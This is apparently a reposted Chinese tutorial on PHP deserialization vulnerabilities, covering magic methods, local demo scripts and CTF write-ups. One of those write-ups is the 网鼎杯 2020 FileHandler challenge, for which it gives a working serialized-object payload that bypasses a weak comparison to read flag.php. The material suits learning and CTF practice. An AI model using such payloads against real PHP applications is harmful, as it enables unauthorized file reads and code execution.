当前位置: 首页 > wzjs >正文

湘潭网站建设电话磐石网络必应网站管理员工具

wzjs 2025/9/12 0:42:12
湘潭网站建设电话磐石网络,必应网站管理员工具,网站开发环境构建,企业门户网站建设市场WEB漏洞-反序列化之PHP&JAVA全解(上) 一、PHP 反序列化原理二、案例演示2.1、无类测试2.1.1、本地2.1.2、CTF 反序列化小真题2.1.3、CTF 反序列化类似题 2.2、有类魔术方法触发2.2.1、本地2.2.2、网鼎杯 2020 青龙大真题 三、参考资料 一、PHP 反序列…

WEB漏洞-反序列化之PHP&JAVA全解(上)

  • 一、PHP 反序列化原理
  • 二、案例演示
    • 2.1、无类测试
      • 2.1.1、本地
      • 2.1.2、CTF 反序列化小真题
      • 2.1.3、CTF 反序列化类似题
    • 2.2、有类魔术方法触发
      • 2.2.1、本地
      • 2.2.2、网鼎杯 2020 青龙大真题
  • 三、参考资料

在这里插入图片描述
在这里插入图片描述

一、PHP 反序列化原理

  • 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。
serialize() //将一个对象转换成一个字符串
unserialize() //将字符串还原成一个对象触发:unserialize 函数的变量可控,文件中存在可利用的类,类中有魔术方法:参考:https://www.cnblogs.com/20175211lyz/p/11403397.html__construct()	//创建对象时触发
__destruct() 	//对象被销毁时触发
__call() 			//在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() 			//用于从不可访问的属性读取数据
__set() 			//用于将数据写入不可访问的属性
__isset() 		//在不可访问的属性上调用 isset()或 empty()触发
__unset() 		//在不可访问的属性上使用 unset()时触发
__invoke() 		//当脚本尝试将对象调用为函数时触发

二、案例演示

在这里插入图片描述

2.1、无类测试

2.1.1、本地

  • unserialize2.php
<?phperror_reporting(0);include "flag.php";$KEY = "xiaodi";$str = $_GET['str'];if (unserialize($str) === "$KEY"){echo "$flag";}show_source(__FILE__);
  • flag.php
<?php$flag='flag{flag_is_here}';
?>

  • serialize在这里插入图片描述

  • unserialize
    在这里插入图片描述

  • 演示:
    在这里插入图片描述

在这里插入图片描述

  • 一点改动:
    在这里插入图片描述
    在这里插入图片描述

2.1.2、CTF 反序列化小真题

  • 链接:
  • 题目:点login咋没反应
    在这里插入图片描述

1、可用发现登录按钮无法使用,只是一个摆设。
在这里插入图片描述

2、查看网页源代码,发现有一个href="admin.css"的可疑信息:

在这里插入图片描述
3、点进去查看,发现提示:
在这里插入图片描述
4、在url后面加上?23727,发现有反馈。
在这里插入图片描述

5、分析代码,可以得出:要想得到flag的值,要让COOKIE的值与KEY的值相等。同时还要满足一个条件:URL上不能够出现23727这个参数,否则执行的是显示源文件的信息,而不是flag的值。

6、抓包,并添加Cookie
在这里插入图片描述

7、获得flag的值。
在这里插入图片描述

2.1.3、CTF 反序列化类似题

在这里插入图片描述
1、在URL后面添上?hint可以查看到代码。
在这里插入图片描述

2、比较COOKIE的值与KEY的值是否相等时,存在一个陷阱。
在这里插入图片描述
3、使用KEY为空的值,进行反序列化。
在这里插入图片描述
在这里插入图片描述
4、获得flag。
在这里插入图片描述

2.2、有类魔术方法触发

2.2.1、本地

  • unserialize3.php
<?phpclass ABC{public $test;function __construct(){$test = 1;echo '调用了构造函数<br>';}function __destruct(){echo '调用了析构函数<br>';}function __wakeup(){echo '调用了苏醒函数<br>';}}echo '创建对象a<br>';$a = new ABC;echo '序列化<br>';$a_ser=serialize($a);echo '反序列化<br>';$a_unser=unserialize($a_ser);echo '对象快死了<br>';

在这里插入图片描述

2.2.2、网鼎杯 2020 青龙大真题

  • 题目链接:https://www.ctfhub.com/#/challenge
    在这里插入图片描述

1、进入环境:
在这里插入图片描述

 <?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}private function write() {if(isset($this->filename) && isset($this->content)) {if(strlen((string)$this->content) > 100) {$this->output("Too long!");die();}$res = file_put_contents($this->filename, $this->content);if($res) $this->output("Successful!");else $this->output("Failed!");} else {$this->output("Failed!");}}private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}private function output($s) {echo "[Result]: <br>";echo $s;}function __destruct() {if($this->op === "2")$this->op = "1";$this->content = "";$this->process();}}function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str);}}

2、分析代码:

  • 主函数(传递参数有效就将参数反序列化):
function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str);}}
  • 类之前(包含文件,高亮源代码):
include("flag.php");highlight_file(__FILE__);
  • 类的源代码
// 	- 第一:获取 flag 存储 flag.php
//	- 第二:两个魔术方法__destruct __constructclass FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}

// 	- 第三:传输 str 参数数据后触发 destruct(反序列化之后,相当于添加了一个对象(但是不会触发construct方法,因为是反序列化得来的)。但是会在最后触发destruct方法),存在 is_valid 过滤(如果OP===2,赋值为1;否则就将content赋值为空,调用process方法) function __destruct() {if($this->op === "2")$this->op = "1";$this->content = "";$this->process();}

// - 第四:__destruct 中会调用 process,其中 op=1 就写入, op=2 就调用读取方法并且赋值给res,再打印res(output()为打印),否则就输出坏黑客。public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}// 写入(OP=1写入)// ---如果filename和content都存在,并且content的长度小于100,就将content写入filename,并且输出成功。否则输出失败。private function write() {if(isset($this->filename) && isset($this->content)) {if(strlen((string)$this->content) > 100) {$this->output("Too long!");die();}$res = file_put_contents($this->filename, $this->content);if($res) $this->output("Successful!");else $this->output("Failed!");} else {$this->output("Failed!");}}// #读取(OP=2读取)// ---如果filename存在,就读取文件。并且打印读取的内容。private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}
 // - 第五:涉及对象 FileHandler,变量 op 及 filename,content,进行构造输出。

  • 原理解析(涉及:反序列化魔术方法调用,弱类型绕过,ascii 绕过)

    • 使用该类对 flag 进行读取,这里面能利用的只有__destruct 函数(析构函数)。
    • __destruct 函数对$this->op 进行了===判断并内容在 2 字符串时会赋值为 1(但是process 函数中使用==$this->op 进行判断(为 2 的情况下才能读取内容))
    • 因此这里存在弱类型比较,可以使用数字 2字符串' 2'绕过判断。
    • is_valid 函数还对序列化字符串进行了校验,因为成员被 protected 修饰,因此序列化字符串中会出现 ascii 为 0 的字符。经过测试,在 PHP7.2+的环境中,使用 public 修饰成员并序列化,反序列化后成员也会被 public 覆盖修饰。

  • 总结:

    • 传参str --> destruct方法(强类型对比)
    • op值对比 === 对比类型和值
    • op=’ 2’(字符串);op=‘2’ 两者不相等,不成立
    • 成立,强制op=1,反之op=自己设置的值
    • process()弱类型对比,将’ 2’‘2’对比是一致的

3、分析并构造payload:(protected会在前后加上 %00
在这里插入图片描述

?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:2:"xd";}
  • 如果使用protected
    在这里插入图片描述

4、运行。
在这里插入图片描述

5、查看网页源代码,获得flag。
在这里插入图片描述

5、更多解法。
https://blog.csdn.net/qq_36438489/article/details/106230811

三、参考资料

  • https://www.cnblogs.com/20175211lyz/p/11403397.html
  • http://www/dooccn.com/php/
  • https://www.ctfhub.com/#/challenge
  • http://php.jsrun.net/php/t/LWKKp
http://www.dtcms.com/wzjs/698897.html

相关文章:

  • 东城专业网站建设公司绵阳做seo网站公司
  • 做个外贸网站一般需要多少钱辽宁省住房与城乡建设厅网站
  • 茶叶网站设计免费网站推广产品
  • 做网站的数据从哪里来南平建设局网站
  • 淘宝官方网站主页云主机配置网站
  • 临汾市住房城乡建设局网站中国都有哪些网站
  • 外贸建站哪家公司好设计竞赛网
  • 网站备案 流程影视设计
  • 做期货的一般看什么网站怎么做网站跳转
  • 遵义做网站 0852twordpress首页加登录
  • 深圳网站设计我选刻微软网站做u盘启动教程
  • 做风帆网站需要多少钱网页设计与网站建设试题
  • seo技术 如何优化网站内部结构上海松江品划做网站
  • 政务门户网站建设思想广州比较好的网站建设公司
  • 青岛vps网站西安做网站公司工资
  • 手机网站建设做魔杖网站
  • 做网店好还是网站网页制作软件是哪个
  • pc网站制作APP易企秀可以做网站吗
  • 湖南企业做网站电子商务网站建设与网页设计
  • 做图有什么网站什么软件制作网站快
  • 怎么申请建立一个公司网站万能网页编辑器
  • 做公众号的网站模板下载网络营销方案成功案例
  • 网站建设 资质要求网站建设方案书范文
  • 淘宝网站建设需要哪些技术如何买域名
  • 现如今网站开发用什么框架单页营销网站后台
  • 怎么做非法彩票网站天津住房城乡建设厅官方网站
  • 网站友情链接形式滁州做网站电话号码
  • 怀化物流网站建设报价wordpress教程 gofair
  • 个人网站发布怎么做如何推广小程序
  • 合肥seo整站优化网站电商平台哪个最好